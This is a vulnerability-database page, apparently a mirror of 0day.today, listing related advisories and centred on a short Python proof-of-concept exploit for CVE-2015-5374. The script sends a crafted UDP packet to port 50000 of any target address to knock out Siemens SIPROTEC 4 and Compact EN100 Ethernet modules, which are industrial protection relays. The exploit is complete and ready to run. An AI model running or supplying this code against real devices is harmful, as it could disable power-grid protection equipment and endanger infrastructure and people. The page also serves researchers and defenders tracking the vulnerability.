Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtCan Kurnaz1337DAY-ID-29803
HistoryFeb 17, 2018 - 12:00 a.m.

Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < 4.25 - Denial of Service Exploit

2018-02-1700:00:00
Can Kurnaz
0day.today
39

EPSS

0.337

Percentile

97.1%

JSON

Exploit for hardware platform in category dos / poc

# Exploit Title: Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < V4.25 - Denial of Service
# Exploit Author: M. Can Kurnaz
# Contact: https://twitter.com/0x43414e
# Vendor Homepage: https://www.siemens.com
# Version: All devices that include the EN100 Ethernet module version V4.24 or prior.
# Tested on: Siemens SIPROTEC 4 (multiple versions < V4.25).
# CVE : CVE-2015-5374
# Vulnerability Details: 
# https://www.cvedetails.com/cve/CVE-2015-5374/
# https://ics-cert.us-cert.gov/advisories/ICSA-15-202-01
 
#!/usr/bin/env python
 
import socket
import sys
 
print('CVE-2015-5374 Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < V4.25 - Denial of Service')
 
if len(sys.argv) < 2:
    print('Usage: ' + sys.argv[0] + ' [target]')
    sys.exit(1)
 
print('Sending packet to ' + sys.argv[1] + ' ...')
 
payload = bytearray('11 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 9E'.replace(' ', '').decode('hex')) 
 
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, (sys.argv[1], 50000))
 
print('Done, say goodbye!')

#  0day.today [2018-03-19]  #

Related

ics 8
exploitpack 1
nessus 2
metasploit 1
exploitdb 1
cvelist 1
nvd 1
packetstorm 2
checkpoint_advisories 1
prion 1
cve 1
ics
ics
Siemens SIPROTEC Denial-of-Service Vulnerability
2018-08-27 12:00:00
Siemens SIPROTEC 4 and SIPROTEC Compact (Update B)
2017-07-06 00:00:00
Siemens SIPROTEC 4 and SIPROTEC Compact (Update F)
2018-03-20 12:00:00
exploitpack
exploitpack
Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module 4.25 - Denial of Service
2018-02-16 00:00:00
nessus
nessus
Siemens Siprotec Unspecified Vulnerability
2019-11-08 00:00:00
Siemens EN100 Ethernet module & SIPROTEC Merging Unit Denial of Service (CVE-2015-5374)
2022-02-07 00:00:00
metasploit
metasploit
Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module - Denial of Service
2018-03-08 13:09:53
exploitdb
exploitdb
Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module &lt; 4.25 - Denial of Service
2018-02-16 00:00:00
cvelist
cvelist
CVE-2015-5374
2015-07-18 10:00:00
nvd
nvd
CVE-2015-5374
2015-07-18 10:59:04
packetstorm
packetstorm
Siemens SIPROTEC 4 / Compact EN100 Ethernet Module Denial Of Service
2018-02-16 00:00:00
Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module Denial Of Service
2024-08-31 00:00:00
checkpoint_advisories
checkpoint_advisories
Siemens SIPROTEC Denial of Service (CVE-2015-5374)
2017-06-14 00:00:00
prion
prion
Design/Logic Flaw
2015-07-18 10:59:00
cve
cve
CVE-2015-5374
2015-07-18 10:59:04

EPSS

0.337

Percentile

97.1%

JSON
Related for 1337DAY-ID-29803
ics8exploitpack1nessus2metasploit1exploitdb1cvelist1nvd1packetstorm2checkpoint_advisories1prion1cve1